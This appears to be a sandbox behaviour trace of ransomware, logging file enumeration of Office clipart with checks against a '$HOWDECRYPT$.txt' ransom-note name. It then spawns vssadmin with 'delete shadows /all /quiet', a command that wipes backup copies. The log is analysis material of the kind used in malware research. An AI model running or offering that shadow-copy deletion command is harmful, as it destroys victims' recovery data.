[0098.509] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.509] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187835.WMF") returned 67 [0098.509] StrStrIW (lpFirst="J0187835.WMF", lpSrch=".spyhunter") returned 0x0 [0098.509] lstrcmpW (lpString1="J0187835.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.509] lstrcmpW (lpString1="J0187835.WMF", lpString2="_uninstalling_.png") returned 1 [0098.509] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187835.WMF") returned 67 [0098.509] GetProcessHeap () returned 0x2c0000 [0098.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2d8e8 [0098.509] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2bc8) returned 0x2c249b0 [0098.509] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.509] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187837.WMF") returned 67 [0098.509] StrStrIW (lpFirst="J0187837.WMF", lpSrch=".spyhunter") returned 0x0 [0098.509] lstrcmpW (lpString1="J0187837.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.509] lstrcmpW (lpString1="J0187837.WMF", lpString2="_uninstalling_.png") returned 1 [0098.510] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187837.WMF") returned 67 [0098.510] GetProcessHeap () returned 0x2c0000 [0098.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c24088 [0098.510] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2bd0) returned 0x2c249b0 [0098.510] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.510] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187839.WMF") returned 67 [0098.510] StrStrIW (lpFirst="J0187839.WMF", lpSrch=".spyhunter") returned 0x0 [0098.510] lstrcmpW (lpString1="J0187839.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.510] lstrcmpW (lpString1="J0187839.WMF", lpString2="_uninstalling_.png") returned 1 [0098.510] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187839.WMF") returned 67 [0098.510] GetProcessHeap () returned 0x2c0000 [0098.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390ff0 [0098.510] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2bd8) returned 0x2c249b0 [0098.510] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.510] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187847.WMF") returned 67 [0098.510] StrStrIW (lpFirst="J0187847.WMF", lpSrch=".spyhunter") returned 0x0 [0098.510] lstrcmpW (lpString1="J0187847.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.511] lstrcmpW (lpString1="J0187847.WMF", lpString2="_uninstalling_.png") returned 1 [0098.511] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187847.WMF") returned 67 [0098.511] GetProcessHeap () returned 0x2c0000 [0098.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3910c0 [0098.511] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2be0) returned 0x2c249b0 [0098.511] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.511] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187849.WMF") returned 67 [0098.511] StrStrIW (lpFirst="J0187849.WMF", lpSrch=".spyhunter") returned 0x0 [0098.511] lstrcmpW (lpString1="J0187849.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.511] lstrcmpW (lpString1="J0187849.WMF", lpString2="_uninstalling_.png") returned 1 [0098.511] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187849.WMF") returned 67 [0098.511] GetProcessHeap () returned 0x2c0000 [0098.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391190 [0098.511] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2be8) returned 0x2c249b0 [0098.511] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.512] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187851.WMF") returned 67 [0098.512] StrStrIW (lpFirst="J0187851.WMF", lpSrch=".spyhunter") returned 0x0 [0098.512] lstrcmpW (lpString1="J0187851.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.512] lstrcmpW (lpString1="J0187851.WMF", lpString2="_uninstalling_.png") returned 1 [0098.512] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187851.WMF") returned 67 [0098.512] GetProcessHeap () returned 0x2c0000 [0098.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391260 [0098.512] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2bf0) returned 0x2c249b0 [0098.512] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.512] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187859.WMF") returned 67 [0098.512] StrStrIW (lpFirst="J0187859.WMF", lpSrch=".spyhunter") returned 0x0 [0098.512] lstrcmpW (lpString1="J0187859.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.512] lstrcmpW (lpString1="J0187859.WMF", lpString2="_uninstalling_.png") returned 1 [0098.512] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187859.WMF") returned 67 [0098.512] GetProcessHeap () returned 0x2c0000 [0098.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391330 [0098.512] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2bf8) returned 0x2c249b0 [0098.513] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.513] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187861.WMF") returned 67 [0098.513] StrStrIW (lpFirst="J0187861.WMF", lpSrch=".spyhunter") returned 0x0 [0098.513] lstrcmpW (lpString1="J0187861.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.513] lstrcmpW (lpString1="J0187861.WMF", lpString2="_uninstalling_.png") returned 1 [0098.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187861.WMF") returned 67 [0098.513] GetProcessHeap () returned 0x2c0000 [0098.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391400 [0098.513] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c00) returned 0x2c249b0 [0098.513] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.513] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187863.WMF") returned 67 [0098.513] StrStrIW (lpFirst="J0187863.WMF", lpSrch=".spyhunter") returned 0x0 [0098.513] lstrcmpW (lpString1="J0187863.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.513] lstrcmpW (lpString1="J0187863.WMF", lpString2="_uninstalling_.png") returned 1 [0098.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187863.WMF") returned 67 [0098.513] GetProcessHeap () returned 0x2c0000 [0098.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3914d0 [0098.513] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c08) returned 0x2c249b0 [0098.514] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.514] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF") returned 67 [0098.514] StrStrIW (lpFirst="J0187881.WMF", lpSrch=".spyhunter") returned 0x0 [0098.514] lstrcmpW (lpString1="J0187881.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.514] lstrcmpW (lpString1="J0187881.WMF", lpString2="_uninstalling_.png") returned 1 [0098.514] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF") returned 67 [0098.514] GetProcessHeap () returned 0x2c0000 [0098.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3915a0 [0098.514] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c10) returned 0x2c249b0 [0098.514] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.517] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF") returned 67 [0098.517] StrStrIW (lpFirst="J0187883.WMF", lpSrch=".spyhunter") returned 0x0 [0098.517] lstrcmpW (lpString1="J0187883.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.517] lstrcmpW (lpString1="J0187883.WMF", lpString2="_uninstalling_.png") returned 1 [0098.517] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF") returned 67 [0098.518] GetProcessHeap () returned 0x2c0000 [0098.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391670 [0098.518] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c18) returned 0x2c249b0 [0098.518] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.518] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF") returned 67 [0098.518] StrStrIW (lpFirst="J0187893.WMF", lpSrch=".spyhunter") returned 0x0 [0098.518] lstrcmpW (lpString1="J0187893.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.518] lstrcmpW (lpString1="J0187893.WMF", lpString2="_uninstalling_.png") returned 1 [0098.518] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF") returned 67 [0098.518] GetProcessHeap () returned 0x2c0000 [0098.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391740 [0098.518] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c20) returned 0x2c249b0 [0098.518] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.518] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF") returned 67 [0098.518] StrStrIW (lpFirst="J0187895.WMF", lpSrch=".spyhunter") returned 0x0 [0098.518] lstrcmpW (lpString1="J0187895.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.518] lstrcmpW (lpString1="J0187895.WMF", lpString2="_uninstalling_.png") returned 1 [0098.518] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF") returned 67 [0098.519] GetProcessHeap () returned 0x2c0000 [0098.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391810 [0098.519] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c28) returned 0x2c249b0 [0098.519] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.519] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187921.WMF") returned 67 [0098.519] StrStrIW (lpFirst="J0187921.WMF", lpSrch=".spyhunter") returned 0x0 [0098.519] lstrcmpW (lpString1="J0187921.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.522] lstrcmpW (lpString1="J0187921.WMF", lpString2="_uninstalling_.png") returned 1 [0098.522] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187921.WMF") returned 67 [0098.541] GetProcessHeap () returned 0x2c0000 [0098.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391740 [0098.541] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c10) returned 0x2c249b0 [0098.541] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.541] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188511.WMF") returned 67 [0098.541] StrStrIW (lpFirst="J0188511.WMF", lpSrch=".spyhunter") returned 0x0 [0098.541] lstrcmpW (lpString1="J0188511.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.543] lstrcmpW (lpString1="J0188511.WMF", lpString2="_uninstalling_.png") returned 1 [0098.543] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188511.WMF") returned 67 [0098.543] GetProcessHeap () returned 0x2c0000 [0098.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391810 [0098.543] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c18) returned 0x2c249b0 [0098.543] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.543] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188513.WMF") returned 67 [0098.543] StrStrIW (lpFirst="J0188513.WMF", lpSrch=".spyhunter") returned 0x0 [0098.543] lstrcmpW (lpString1="J0188513.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.543] lstrcmpW (lpString1="J0188513.WMF", lpString2="_uninstalling_.png") returned 1 [0098.543] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188513.WMF") returned 67 [0098.543] GetProcessHeap () returned 0x2c0000 [0098.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3918e0 [0098.543] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c20) returned 0x2c249b0 [0098.543] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.544] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188519.WMF") returned 67 [0098.544] StrStrIW (lpFirst="J0188519.WMF", lpSrch=".spyhunter") returned 0x0 [0098.544] lstrcmpW (lpString1="J0188519.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.544] lstrcmpW (lpString1="J0188519.WMF", lpString2="_uninstalling_.png") returned 1 [0098.544] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188519.WMF") returned 67 [0098.544] GetProcessHeap () returned 0x2c0000 [0098.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3919b0 [0098.544] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c28) returned 0x2c249b0 [0098.544] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.544] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF") returned 67 [0098.544] StrStrIW (lpFirst="J0188587.WMF", lpSrch=".spyhunter") returned 0x0 [0098.544] lstrcmpW (lpString1="J0188587.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.544] lstrcmpW (lpString1="J0188587.WMF", lpString2="_uninstalling_.png") returned 1 [0098.544] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF") returned 67 [0098.544] GetProcessHeap () returned 0x2c0000 [0098.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391a80 [0098.544] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c30) returned 0x2c249b0 [0098.544] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.545] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF") returned 67 [0098.545] StrStrIW (lpFirst="J0188667.WMF", lpSrch=".spyhunter") returned 0x0 [0098.545] lstrcmpW (lpString1="J0188667.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.545] lstrcmpW (lpString1="J0188667.WMF", lpString2="_uninstalling_.png") returned 1 [0098.545] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF") returned 67 [0098.545] GetProcessHeap () returned 0x2c0000 [0098.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391b50 [0098.545] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c38) returned 0x2c249b0 [0098.545] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.545] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188669.WMF") returned 67 [0098.545] StrStrIW (lpFirst="J0188669.WMF", lpSrch=".spyhunter") returned 0x0 [0098.545] lstrcmpW (lpString1="J0188669.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.545] lstrcmpW (lpString1="J0188669.WMF", lpString2="_uninstalling_.png") returned 1 [0098.545] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188669.WMF") returned 67 [0098.545] GetProcessHeap () returned 0x2c0000 [0098.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3915a0 [0098.554] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c30) returned 0x2c249b0 [0098.554] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.554] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188679.WMF") returned 67 [0098.554] StrStrIW (lpFirst="J0188679.WMF", lpSrch=".spyhunter") returned 0x0 [0098.554] lstrcmpW (lpString1="J0188679.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.554] lstrcmpW (lpString1="J0188679.WMF", lpString2="_uninstalling_.png") returned 1 [0098.554] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188679.WMF") returned 67 [0098.554] GetProcessHeap () returned 0x2c0000 [0098.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391c20 [0098.555] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c38) returned 0x2c249b0 [0098.555] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.555] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195248.WMF") returned 67 [0098.555] StrStrIW (lpFirst="J0195248.WMF", lpSrch=".spyhunter") returned 0x0 [0098.555] lstrcmpW (lpString1="J0195248.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.555] lstrcmpW (lpString1="J0195248.WMF", lpString2="_uninstalling_.png") returned 1 [0098.555] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195248.WMF") returned 67 [0098.555] GetProcessHeap () returned 0x2c0000 [0098.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391cf0 [0098.555] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c40) returned 0x2c249b0 [0098.555] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.555] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195254.WMF") returned 67 [0098.555] StrStrIW (lpFirst="J0195254.WMF", lpSrch=".spyhunter") returned 0x0 [0098.555] lstrcmpW (lpString1="J0195254.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.555] lstrcmpW (lpString1="J0195254.WMF", lpString2="_uninstalling_.png") returned 1 [0098.555] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195254.WMF") returned 67 [0098.555] GetProcessHeap () returned 0x2c0000 [0098.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391dc0 [0098.556] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c48) returned 0x2c249b0 [0098.556] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.556] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195260.WMF") returned 67 [0098.556] StrStrIW (lpFirst="J0195260.WMF", lpSrch=".spyhunter") returned 0x0 [0098.556] lstrcmpW (lpString1="J0195260.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.556] lstrcmpW (lpString1="J0195260.WMF", lpString2="_uninstalling_.png") returned 1 [0098.556] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195260.WMF") returned 67 [0098.556] GetProcessHeap () returned 0x2c0000 [0098.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x391e90 [0098.556] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2c50) returned 0x2c249b0 [0098.556] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.556] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195320.WMF") returned 67 [0098.556] StrStrIW (lpFirst="J0195320.WMF", lpSrch=".spyhunter") returned 0x0 [0098.556] lstrcmpW (lpString1="J0195320.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.556] lstrcmpW (lpString1="J0195320.WMF", lpString2="_uninstalling_.png") returned 1 Thread: id = 18 os_tid = 0xb08 Thread: id = 28 os_tid = 0xb2c Thread: id = 37 os_tid = 0x808 Thread: id = 39 os_tid = 0x5a8 Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x1cd97000" os_pid = "0xaa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa9c" cmd_line = " delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4 os_tid = 0xaac Thread: id = 11 os_tid = 0xad4 Thread: id = 12 os_tid = 0xad8 Thread: id = 13 os_tid = 0xadc Thread: id = 14 os_tid = 0xae0 Process: id = "4" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x58982000" os_pid = "0xae8" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0xaa8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00077d4c" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 19 os_tid = 0xb10 Thread: id = 20 os_tid = 0xb0c Thread: id = 21 os_tid = 0xb04 Thread: id = 22 os_tid = 0xb00 [0083.364] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x109d860 | out: lpSystemTimeAsFileTime=0x109d860*(dwLowDateTime=0x599db610, dwHighDateTime=0x1d4f503)) [0083.364] GetCurrentProcessId () returned 0xae8 [0083.364] GetCurrentThreadId () returned 0xb00 [0083.364] GetTickCount () returned 0x1e935 [0083.364] QueryPerformanceCounter (in: lpPerformanceCount=0x109d868 | out: lpPerformanceCount=0x109d868*=18113525906) returned 1 [0083.364] malloc (_Size=0x100) returned 0x178e80 Thread: id = 23 os_tid = 0xafc Thread: id = 24 os_tid = 0xaf8 